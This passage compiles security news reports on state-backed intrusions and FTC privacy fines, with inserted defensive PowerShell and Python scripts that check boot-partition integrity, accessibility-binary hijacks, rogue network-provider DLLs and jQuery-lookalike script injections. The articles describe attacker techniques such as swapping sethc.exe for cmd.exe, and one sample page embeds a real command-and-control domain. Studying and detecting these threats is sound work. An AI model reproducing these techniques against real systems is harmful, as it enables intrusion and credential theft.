"However, running as a bootloader gives them almost the same capabilities as firmware implants, but without having to overcome the multilevel SPI flash defenses, such as the BWE, BLE, and PRx protection bits, or the protections provided by hardware (like Intel Boot Guard)."
Besides applying the May 2023 Patch Tuesday updates from Microsoft, which addressed a second Secure Boot bypass flaw (CVE-2023-24932, CVSS score: 6.7) exploited by BlackLotus, organizations are advised to carry out the following mitigation steps -
Update recovery media
Configure defensive software to scrutinize changes to the EFI boot partition
Monitor device integrity measurements and boot configuration for anomalous changes in the EFI boot partition
Customize UEFI Secure Boot to block older, signed Windows boot loaders
Remove the Microsoft Windows Production CA 2011 certificate on devices that exclusively boot Linux
Microsoft, for its part, is taking a phased approach to completely close the attack vector. The fixes are expected to be generally available in the first quarter of 2024.
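One way to put the "monitor the integrity of the boot partition" and Secure Boot configuration advice above into practice on a Windows host. This is an added example, not code from the NSA guidance or this article; it assumes an elevated PowerShell session with the built-in SecureBoot module, that drive letter S: is free for mounting the EFI System Partition, a baseline file path of our own choosing, and that the certificate named in the guidance carries the common name "Microsoft Windows Production PCA 2011".

```powershell
#Requires -RunAsAdministrator
# Added example (not from the NSA guidance or the article): snapshot the EFI
# System Partition (ESP) and Secure Boot state, then re-run to spot changes.
# Run once with -WriteBaseline on a known-good host, then periodically without it.
param(
    [string]$BaselinePath = "$env:ProgramData\esp-baseline.json",  # hypothetical path
    [switch]$WriteBaseline
)

$esp = 'S:'
mountvol $esp /S | Out-Null          # mount the hidden FAT32 ESP on S:

function Get-EspSnapshot {
    # Map of "path relative to the ESP root" -> SHA-256 of that file
    $snap = [ordered]@{}
    Get-ChildItem -Path "$esp\" -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $snap[$_.FullName.Substring($esp.Length)] = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
    }
    return $snap
}

try {
    # 1. Secure Boot state: a disabled Secure Boot removes even the Baton Drop hurdle.
    if (-not (Confirm-SecureBootUEFI)) { Write-Warning 'Secure Boot is OFF' }

    # 2. Size of the DBX revocation list. Applying the revocation update for the
    #    vulnerable boot managers makes this variable grow, so a later run shows
    #    whether the update landed (or whether the list unexpectedly shrank).
    $dbxLen = (Get-SecureBootUEFI -Name dbx).Bytes.Length

    # 3. Signer of the Windows boot manager sitting on the ESP.
    $bootmgr = "$esp\EFI\Microsoft\Boot\bootmgfw.efi"
    if (Test-Path $bootmgr) {
        $sig = Get-AuthenticodeSignature -FilePath $bootmgr
        if ($sig.Status -ne 'Valid') { Write-Warning "bootmgfw.efi signature status: $($sig.Status)" }
    }

    # 4. Whether the db (allowed signers) still carries the Windows production CA.
    #    The guidance says to remove it on Linux-only devices; the CN is looked up
    #    as an ASCII substring of the DER-encoded certificates in the variable.
    $db = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name db).Bytes)
    $hasWinCA = $db -match 'Microsoft Windows Production PCA 2011'   # assumed CN of that certificate

    $current = Get-EspSnapshot

    if ($WriteBaseline) {
        @{ dbxLen = $dbxLen; hasWinCA = $hasWinCA; files = $current } |
            ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath
        "Baseline written to $BaselinePath ($($current.Count) files, DBX $dbxLen bytes)"
        return
    }

    $base = Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json
    if ($base.dbxLen -ne $dbxLen) { "DBX size changed: $($base.dbxLen) -> $dbxLen bytes" }
    if ($base.hasWinCA -ne $hasWinCA) { "Presence of the Windows production CA in db changed" }

    # ConvertFrom-Json yields an object, so walk its properties to rebuild the map
    $baseFiles = @{}
    foreach ($p in $base.files.PSObject.Properties) { $baseFiles[$p.Name] = $p.Value }

    # New or modified boot files are exactly what a bootkit dropped on the ESP looks like
    foreach ($path in $current.Keys) {
        if (-not $baseFiles.Contains($path)) { "NEW      $path" }
        elseif ($baseFiles[$path] -ne $current[$path]) { "MODIFIED $path" }
    }
    foreach ($path in $baseFiles.Keys) {
        if (-not $current.Contains($path)) { "REMOVED  $path" }
    }
}
finally {
    mountvol $esp /D | Out-Null       # unmount the ESP again
}
```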
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
19.6.23 BigBrothers The Hacker News
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
"The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week.
The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat."
The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers to infiltrate target networks.
Palo Alto Networks said it detected failed attempts to execute the China Chopper web shell in one of the attacks, prompting the adversary to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
A successful break-in is followed by reconnaissance activity to map out the network and single out critical servers that hold data of value, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.
CL-STA-0043 has also been observed leveraging native Windows tools for privilege escalation, thereby enabling it to create admin accounts and run other programs with elevated privileges.
Another privilege escalation method entails the abuse of accessibility features in Windows – i.e., the "sticky keys" utility (sethc.exe) – that makes it possible to bypass login requirements and backdoor the systems.
"In the attack, the attacker usually replaces the sethc.exe binary or pointers/references to these binaries in the registry, with cmd.exe," Rochberger explained. "When executed, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools."
A similar approach employing the Utility Manager (utilman.exe) to establish persistent backdoor access to a victim's environment was documented by CrowdStrike earlier this April.
Besides using Mimikatz for credential theft, the threat actor's modus operandi stands out for utilizing other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as -
Using network providers to execute a malicious DLL to harvest and export plaintext passwords to a remote server
Leveraging an open-source penetration testing toolset called Yasso to spread across the network, and
Taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest
It's worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group referred to as Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.
"This activity group's level of sophistication, adaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation-state threat actor," Rochberger said.
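One way to hunt for the two persistence and credential-theft mechanisms described above (accessibility binaries such as sethc.exe swapped for cmd.exe or redirected via registry pointers, and a malicious DLL registered as a network provider) on a Windows host. This is an added example, not code from the Palo Alto Networks report; the list of accessibility binaries checked, the use of the Image File Execution Options "Debugger" value as the registry pointer, and the "suspect" heuristics are our own assumptions.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the Palo Alto Networks report: audit accessibility
# binaries and registered network providers for the tampering described above.

# Accessibility helpers that have historically been swapped for cmd.exe (our list)
$accessibilityBins = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                     'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$ifeo     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$system32 = Join-Path $env:SystemRoot 'System32'

function Test-AccessibilityHijack {
    $findings = @()
    $cmdHash = (Get-FileHash -Path (Join-Path $system32 'cmd.exe') -Algorithm SHA256).Hash
    foreach ($bin in $accessibilityBins) {
        # (a) registry pointer: an IFEO "Debugger" value launches another program instead
        $dbg = Get-ItemProperty -Path (Join-Path $ifeo $bin) -Name Debugger -ErrorAction SilentlyContinue
        if ($dbg) { $findings += "IFEO Debugger set for ${bin}: $($dbg.Debugger)" }

        # (b) replaced binary: the on-disk file is cmd.exe, or is no longer validly signed
        $path = Join-Path $system32 $bin
        if (-not (Test-Path $path)) { continue }
        if ((Get-FileHash -Path $path -Algorithm SHA256).Hash -eq $cmdHash) {
            $findings += "$bin is a byte-for-byte copy of cmd.exe"
        }
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') { $findings += "$bin signature status: $($sig.Status)" }
    }
    return $findings
}

function Get-NetworkProviderAudit {
    # Providers are loaded in the order listed here; each one names its DLL under
    # HKLM\SYSTEM\CurrentControlSet\Services\<name>\NetworkProvider\ProviderPath.
    $order = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order' `
                  -Name ProviderOrder -ErrorAction SilentlyContinue).ProviderOrder
    foreach ($name in ($order -split ',' | Where-Object { $_ })) {
        $np   = "HKLM:\SYSTEM\CurrentControlSet\Services\$name\NetworkProvider"
        $prop = Get-ItemProperty -Path $np -Name ProviderPath -ErrorAction SilentlyContinue
        if (-not $prop) { continue }
        # ProviderPath may contain %SystemRoot%; expand it before inspecting the file
        $dll = [Environment]::ExpandEnvironmentVariables($prop.ProviderPath)
        $sig = if (Test-Path $dll) { Get-AuthenticodeSignature -FilePath $dll } else { $null }
        [pscustomobject]@{
            Provider = $name
            Dll      = $dll
            Signer   = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
            Status   = if ($sig) { $sig.Status } else { 'MISSING FILE' }
            # Heuristic: an unsigned provider, or one living outside System32, deserves a look
            Suspect  = (-not $sig) -or ($sig.Status -ne 'Valid') -or ($dll -notlike "$system32\*")
        }
    }
}

$hits = Test-AccessibilityHijack
if ($hits) { $hits | ForEach-Object { Write-Warning $_ } }
else       { 'Accessibility binaries: no hijack indicators found' }
Get-NetworkProviderAudit | Format-Table Provider, Dll, Status, Suspect -AutoSize
```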
New Report Reveals Shuckworm's Long-Running Intrusions on Ukrainian Organizations
15.6.23 BigBrothers The Hacker News
The Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec said in a new report shared with The Hacker News.
"In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said.
"The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more."
Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to Russia's Federal Security Service (FSB). It's said to be active since at least 2013.
The cyber espionage activities consist of spear-phishing campaigns that are designed to entice victims into opening booby-trapped attachments, which ultimately lead to the deployment of information stealers such as Giddome, Pterodo, GammaLoad, and GammaSteel on infected hosts.
"Iron Tilden sacrifices some operational security in favor of high tempo operations, meaning that their infrastructure is identifiable through regular use of specific Dynamic DNS providers, Russian hosting providers, and remote template injection techniques," Secureworks notes in its profile of the threat actor.
In the latest set of attacks detailed by Symantec, the threat actors have been observed using a new PowerShell script to propagate the Pterodo backdoor via USB drives.
While Shuckworm's use of Telegram channels to retrieve the IP address of the server hosting the payloads is well documented, the threat actor is said to have expanded the technique to store command-and-control (C2) addresses on Telegraph, a blogging platform owned by Telegram.
Also used by the group is a PowerShell script ("foto.safe") that's spread through compromised USB drives and features capabilities to download additional malware onto the host.
A further analysis of intrusions shows that the adversary managed to breach the machines of human resources departments of the targeted organizations, suggesting its attempts to glean information about various individuals working at those entities.
The findings are yet another indication of Shuckworm's continued reliance on short-lived infrastructure and its ongoing evolution of tactics and tools to stay ahead of the detection curve.
They also arrive a day after Microsoft shed light on destructive attacks, espionage, and information operations carried out by another Russian nation-state actor known as Cadet Blizzard targeting Ukraine.
"This activity demonstrates that Shuckworm's relentless focus on Ukraine continues," Symantec said. "It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations."
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
15.6.23 BigBrothers The Hacker News
Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate (GRU) and has a "relatively low success rate."
The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586, has graduated it to a named actor dubbed Cadet Blizzard.
"Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company said.
"While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard."
Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel wiper malware called WhisperGate (aka PAYWIPE) in the weeks leading to Russia's military invasion of the country.
The state-sponsored actor, per Microsoft, has a track record of orchestrating destructive attacks, espionage, and information operations aimed at entities located in Ukraine, Europe, Central Asia, and, periodically, Latin America.
Suspected to have been operational in some capacity since at least 2020, intrusions mounted by Cadet Blizzard have predominantly focused on government agencies, law enforcement, non-profit and non-governmental organizations, IT service providers, and emergency services.
"Cadet Blizzard is active seven days a week and has conducted its operations during its primary targets' off-business hours when its activity is less likely to be detected," Microsoft's Tom Burt said. "In addition to Ukraine, it also focuses on NATO member states involved in providing military aid to Ukraine."
It's worth noting that Cadet Blizzard also overlaps with groups monitored by the broader cybersecurity community under the names Ember Bear (CrowdStrike), FROZENVISTA (Google TAG), Nodaria (Symantec), TA471 (Proofpoint), UAC-0056 (CERT-UA), and UNC2589 (Google Mandiant).
Besides WhisperGate, the hacking crew is known to leverage a raft of weapons for its arsenal, including SaintBot, OutSteel, GraphSteel, GrimPlant, and more recently, Graphiron. Microsoft has attributed SaintBot and OutSteel to a related activity cluster labeled Storm-0587.
"Cadet Blizzard is also linked to the defacements of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as 'Free Civilian,'" Microsoft added.
Other notable tradecraft entails the use of living-off-the-land (LotL) techniques post gaining initial access to achieve lateral movement, collect credentials and other information, and deploy tools to facilitate defense evasion and persistence.
The cyber assaults, for their part, are accomplished through the exploitation of known flaws in exposed web servers (e.g., Atlassian Confluence and Microsoft Exchange Server) and content management systems.
"As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict," Microsoft noted.
Microsoft to Pay $20 Million Penalty for Illegally Collecting Kids' Data on Xbox
8.6.23 BigBrothers The Hacker News
Microsoft has agreed to pay a penalty of $20 million to settle U.S. Federal Trade Commission (FTC) charges that the company illegally collected and retained the data of children who signed up to use its Xbox video game console without their parents' knowledge or consent.
"Our proposed order makes it easier for parents to protect their children's privacy on Xbox, and limits what information Microsoft can collect and retain about kids," FTC's Samuel Levine said. "This action should also make it abundantly clear that kids' avatars, biometric data, and health information are not exempt from COPPA."
As part of the proposed settlement, which is pending court approval, Redmond has been ordered to update its account creation process for children to prevent the collection and storage of data, including obtaining parental consent and deleting said information within two weeks if approval is not obtained.
The privacy protections also extend to third-party gaming publishers with whom Microsoft shares children's data, in addition to subjecting biometric information and avatars created from children's faces to the privacy laws.
Microsoft, per the FTC, violated COPPA's consent and data retention requirements by requiring those under 13 to provide their first and last names, email addresses, dates of birth, and phone numbers until late 2021.
Furthermore, the Windows maker is said to have shared the user data with advertisers by default until 2019 when consenting to Microsoft's service agreement and advertising policy.
"It wasn't until after users provided this personal information that Microsoft required anyone who indicated they were under 13 to involve their parent," the FTC said. "The child's parent then had to complete the account creation process before the child could get their own account."
Microsoft, however, chose to retain data collected from children during the account creation step for years even in scenarios where a parent did not complete the signup process, thereby contravening child privacy laws in the U.S.
The company has further been accused of creating a unique persistent identifier for underage accounts and sharing that information with third-party game and app developers and explicitly requiring parents to opt out in order to prevent their children from accessing third-party games and apps in Xbox Live.
Xbox, in response, said it's taking additional steps to improve its age verification systems and to ensure that parents are involved in the creation of child accounts for the service. It did not disclose the exact specifics of what such a system may be.
It also blamed some of the issues on a technical glitch that failed to "delete account creation data for child accounts where the account creation process was started but not completed," emphasizing that the data was promptly deleted and never "used, shared, or monetized."
This is not the first time a video game maker has been fined by the FTC over COPPA violations. In December 2022, Fortnite developer Epic Games reached a $520 million settlement with the agency in part for flouting online privacy laws for children.
The fines come as Microsoft disclosed it anticipates fines to the tune of "approximately $425 million" from the Irish Data Protection Commission (DPC) in the fourth quarter of 2023 for potentially violating the European Union General Data Protection Regulation (GDPR) to serve targeted ads to LinkedIn users.
The development also comes close on the heels of the FTC levying Amazon a cumulative $30.8 million fine over a series of privacy lapses regarding its Alexa assistant and Ring security cameras.
FTC Slams Amazon with $30.8M Fine for Privacy Violations Involving Alexa and Ring
5.6.23 BigBrothers The Hacker News
The U.S. Federal Trade Commission (FTC) has fined Amazon a cumulative $30.8 million over a series of privacy lapses regarding its Alexa assistant and Ring security cameras.
This comprises a $25 million penalty for breaching children's privacy laws by retaining their Alexa voice recordings for indefinite time periods and preventing parents from exercising their deletion rights.
"Amazon's history of misleading parents, keeping children's recordings indefinitely, and flouting parents' deletion requests violated COPPA and sacrificed privacy for profits," FTC's Samuel Levine said.
As part of the court order, the retail giant has been mandated to delete the collected information, including inactive child accounts, geolocation data, and voice recordings, and prohibited from gathering such data to train its algorithms. It's also required to disclose to customers its data retention practices.
Amazon has also agreed to fork out an additional $5.8 million in consumer refunds for breaching users' privacy by permitting any employee or contractor to gain broad and unfettered access to private videos recorded using Ring cameras.
"For example, one employee over several months viewed thousands of video recordings belonging to female users of Ring cameras that surveilled intimate spaces in their homes such as their bathrooms or bedrooms," the FTC noted. "The employee wasn't stopped until another employee discovered the misconduct."
The consumer protection authority, besides faulting Amazon for failing to adequately notify customers or obtain their consent before using the captured recordings for product improvement, called out the company for not implementing adequate security controls to protect Ring user accounts.
The "egregious" violations exposed users to credential stuffing and brute-force attacks, enabling miscreants to take control of the accounts and gain unauthorized access to video streams.
"Bad actors not only viewed some customers' videos but also used Ring cameras' two-way functionality to harass, threaten, and insult consumers—including elderly individuals and children—whose rooms were monitored by Ring cameras, and to change important device settings," it explained.
"Hackers taunted several children with racist slurs, sexually propositioned individuals, and threatened a family with physical harm if they didn't pay a ransom."
More than 55,000 U.S. customers are estimated to have had their accounts compromised between January 2019 and March 2020 as a result of these lax policies.
The proposed settlement further requires Amazon to purge all customer videos and facial data that it unlawfully obtained prior to 2018, and also take down any work products it derived from those videos.
While both settlements must be approved by a court to take effect, Amazon said "we take our responsibilities to our customers and their families very seriously" and that it's "consistently taken steps to protect customer privacy by providing clear privacy disclosures and customer controls, [...] and maintaining strict internal controls to protect customer data."
The development comes weeks after the FTC accused Meta of "repeatedly" violating its privacy promises and misleading parents about their ability to control with whom their children communicated through its Messenger Kids app between late 2017 and mid-2019.
The regulator is also seeking a blanket ban that would prohibit the company from profiting off of children's data. Meta has labeled the allegations as a "political stunt" and said it operates an "industry-leading privacy program."
China's Stealthy Hackers Infiltrate U.S. and Guam Critical Infrastructure Undetected
25.5.23 BigBrothers The Hacker News
A stealthy China-based group managed to establish a persistent foothold into critical infrastructure organizations in the U.S. and Guam without being detected, Microsoft and the "Five Eyes" nations said on Wednesday.
The tech giant's threat intelligence team is tracking the activity, which includes post-compromise credential access and network system discovery, under the name Volt Typhoon.
The state-sponsored actor is geared towards espionage and information gathering, with the cluster active since June 2021 and obscuring its intrusion footprint by taking advantage of tools already installed or built into infected machines.
Some of the prominent sectors targeted include communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education.
The company further assessed with moderate confidence that the campaign is "pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises."
A defining characteristic of the attacks is the "strong emphasis" on staying under the radar by exclusively relying on living-off-the-land (LotL) techniques to exfiltrate data from local web browser applications and leverage stolen credentials for backdoor access.
The main goal is to sidestep detection by harmonizing with regular Windows system and network activities, indicating that the threat actor is deliberately keeping a low profile to gain access to sensitive information.
"In addition, Volt Typhoon tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware," Microsoft said.
Another unusual tradecraft is the use of custom versions of open source tools to establish a command-and-control (C2) channel over proxy as well as other organizations' compromised servers in its C2 proxy network to hide the source of the attacks.
In one incident reported on by the New York Times, the adversarial collective breached telecommunications networks on the island of Guam, a sensitive U.S. military outpost in the Pacific Ocean, and installed a malicious web shell.
The initial entry vector involves exploiting internet-facing Fortinet FortiGuard devices by means of an unknown zero-day flaw, although Volt Typhoon has also been observed weaponizing flaws in Zoho ManageEngine servers. The access is then abused to steal credentials and break into other devices on the network.
The Windows maker also noted it directly notified targeted or compromised customers and provided them with the necessary information to secure their environments.
It, however, warned that it could be "particularly challenging" to mitigate such risks when threat actors make use of valid accounts and living-off-the-land binaries (LOLBins) to pull off their attacks.
Secureworks, which is monitoring the threat group under the name Bronze Silhouette, said it has "demonstrated careful consideration for operational security [...] and reliance on compromised infrastructure to prevent detection and attribution of its intrusion activity."
The development also comes as Reuters disclosed that Chinese hackers targeted Kenya's government in a far-reaching three-year-long series of attacks against key ministries and state institutions in an alleged attempt to obtain information about the "debt owed to Beijing by the East African nation."
The digital offensive is suspected to have been carried out by BackdoorDiplomacy (aka APT15, Playful Taurus, or Vixen Panda), which is known to target government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.
Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware
25.5.23 BigBrothers The Hacker News
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations.
Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections.
Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater. It's known to be active since at least December 2020.
In December 2022, the hacking crew was attributed to a set of attempted disruptive intrusions that were directed against diamond industries in South Africa, Israel, and Hong Kong.
These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++.
"The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said.
The infection sequence begins with the exploitation of vulnerabilities within internet-exposed web servers, leading to the deployment of a web shell referred to as ASPXSpy.
In the subsequent steps, the web shell is used as a conduit to deliver publicly-known tools in order to perform reconnaissance of the victim environment, move laterally, harvest credentials, and exfiltrate data.
Also executed on the compromised host is the Moneybird ransomware, which is engineered to encrypt sensitive files in the "F:\User Shares" folder and drop a ransom note urging the company to contact them within 24 hours or risk getting their stolen information leaked.
"The use of a new ransomware demonstrates the actor's additional efforts to enhance capabilities, as well as hardening attribution and detection efforts," the researchers said. "Despite these new 'covers,' the group continues to follow its usual behavior and utilize similar tools and techniques as before."
Agrius is far from the only Iranian state-sponsored group to engage in cyber operations targeting Israel. A report from Microsoft last month uncovered MuddyWater's collaboration with another cluster dubbed Storm-1084 (aka DEV-1084) to deploy the DarkBit ransomware.
The findings also come as ClearSky disclosed that no fewer than eight websites associated with shipping, logistics, and financial services companies in Israel were compromised as part of a watering hole attack orchestrated by the Iran-linked Tortoiseshell group.
In a related development, Proofpoint revealed that regional managed service providers (MSPs) within Israel have been targeted by MuddyWater as part of a phishing campaign designed to initiate supply chain attacks against their downstream customers.
The enterprise security firm further highlighted escalating threats to small and medium-sized businesses (SMBs) from sophisticated threat groups, which have been observed leveraging compromised SMB infrastructure for phishing campaigns and financial theft.
GUAC 0.1 Beta: Google's Breakthrough Framework for Secure Software Supply Chains
25.5.23 Security The Hacker News
Google on Wednesday announced the 0.1 Beta version of GUAC (short for Graph for Understanding Artifact Composition) for organizations to secure their software supply chains.
To that end, the search giant is making available the open source framework as an API for developers to integrate their own tools and policy engines.
GUAC aims to aggregate software security metadata from different sources into a graph database that maps out relationships between software, helping organizations determine how one piece of software affects another.
"Graph for Understanding Artifact Composition (GUAC) gives you organized and actionable insights into your software supply chain security position," Google says in its documentation.
"GUAC ingests software security metadata, like SBOMs, and maps out the relationship between software so that you can fully understand your software security position."
In other words, it's designed to bring together Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, deps.dev insights, and a company's internal private metadata to help create a better picture of the risk profile and visualize the relationships between artifacts, packages, and repositories.
With such a setup in place, the goal is to tackle high-profile supply chain attacks, generate a patch plan, and swiftly respond to security compromises.
"For example, GUAC can be used to certify that a builder is compromised (e.g., via credential leakage or ingestion of malware) and then query for affected artifacts," Google said.
"This enables the [chief information security officer] to easily create a policy to forbid use of any software from within the blast radius."
Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry
25.5.23 BigBrothers The Hacker News
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack.
Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456.
"The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code.
Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans.
That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with watering holes.
The attack method, also called strategic website compromises, works by infecting a website that's known to be commonly visited by a group of users or those within a specific industry to enable the distribution of malware.
In August 2022, an emerging Iranian actor named UNC3890 was attributed to a watering hole hosted on a login page of a legitimate Israeli shipping company that's designed to transmit preliminary data about the logged-in user to an attacker-controlled domain.
The latest intrusions documented by ClearSky show that the malicious JavaScript injected into the websites functions in a similar manner, collecting information about the system and sending it to a remote server.
The JavaScript code further attempts to determine the user's language preference, which ClearSky said could be "useful to the attacker to customize their attack based on the user's language."
On top of that, the attacks also make use of a domain named jquery-stack[.]online for command-and-control (C2). The goal is to fly under the radar by impersonating the legitimate jQuery JavaScript framework.
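A defender reviewing a site for the kind of injection described above can inventory every third-party script include and flag hosts that carry the jQuery brand but are not a known jQuery distribution point. The script below is an added example, not code from ClearSky or from the report; the allowlist of legitimate hosts is an assumption to adjust per site, and the sample page is constructed, with the injected include using the C2 domain named in the report.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately serve jQuery (an assumed allowlist; extend it with
# the CDNs your own sites actually use).
KNOWN_JQUERY_HOSTS = {
    "code.jquery.com",
    "ajax.googleapis.com",
    "cdnjs.cloudflare.com",
    "cdn.jsdelivr.net",
}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def extract_script_sources(html):
    parser = ScriptSrcCollector()
    parser.feed(html)
    return parser.sources


def host_of(url):
    """Return the lowercase hostname of a script URL ('' for relative URLs)."""
    if url.startswith("//"):          # protocol-relative CDN includes
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def is_jquery_lookalike(url, allowlist=KNOWN_JQUERY_HOSTS):
    """True when the host carries the jQuery brand but is not a known jQuery host."""
    host = host_of(url)
    if not host or host in allowlist:
        return False
    return "jquery" in host


def find_suspicious_includes(html, allowlist=KNOWN_JQUERY_HOSTS):
    """List the third-party script includes on a page that look like jQuery impostors."""
    return [src for src in extract_script_sources(html)
            if is_jquery_lookalike(src, allowlist)]


# Constructed sample page: a legitimate jQuery include, a local script, and an
# injected include pointing at the C2 domain named in the ClearSky report.
SAMPLE_HTML = """
<html><head>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="/static/app.js"></script>
  <script src="https://jquery-stack.online/jquery.min.js"></script>
</head><body><h1>Shipping portal</h1></body></html>
"""

if __name__ == "__main__":
    for src in find_suspicious_includes(SAMPLE_HTML):
        print("suspicious script include:", src)
```

Running this over a crawl of your own pages (or over stored HTTP responses) turns the report's indicator into a reusable check: any new include whose hostname contains the brand string but is not on the allowlist is worth a look, whether or not it matches the specific domain seen here.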
The development comes as Israel continues to be the most prominent target for Iranian state-sponsored crews. Microsoft, earlier this month, highlighted their new approach of combining "offensive cyber operations with multi-pronged influence operations to fuel geopolitical change in alignment with the regime's objectives."
Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation
24.5.23 BigBrothers The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign.
The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown.
In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox.
The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware.
This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific extensions (STILLARCH or DownEx).
It's worth noting that DownEx was recently documented by Bitdefender as being used by an unknown actor in highly targeted attacks aimed at government entities in Kazakhstan and Afghanistan.
"Additional study of the infrastructure and related files made it possible to conclude that among the objects of interest of the group are organizations from Mongolia, Kazakhstan, Kyrgyzstan, Israel, [and] India," CERT-UA said.
The findings show that some threat actors are still employing macro-based malware despite Microsoft disabling the feature by default in Office files downloaded from the web.
That said, Microsoft's restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling.
Enterprise security firm Proofpoint said it observed multiple initial access brokers (IABs) – actors who infiltrate major targets and then sell that access to other cybercriminals for profit – using PDF and OneNote files starting in December 2022.
"The experimentation with and regular pivoting to new payload delivery techniques by tracked threat actors, especially IABs, is vastly different from attack chains observed prior to 2022 and heralds a new normal of threat activity," the company said.
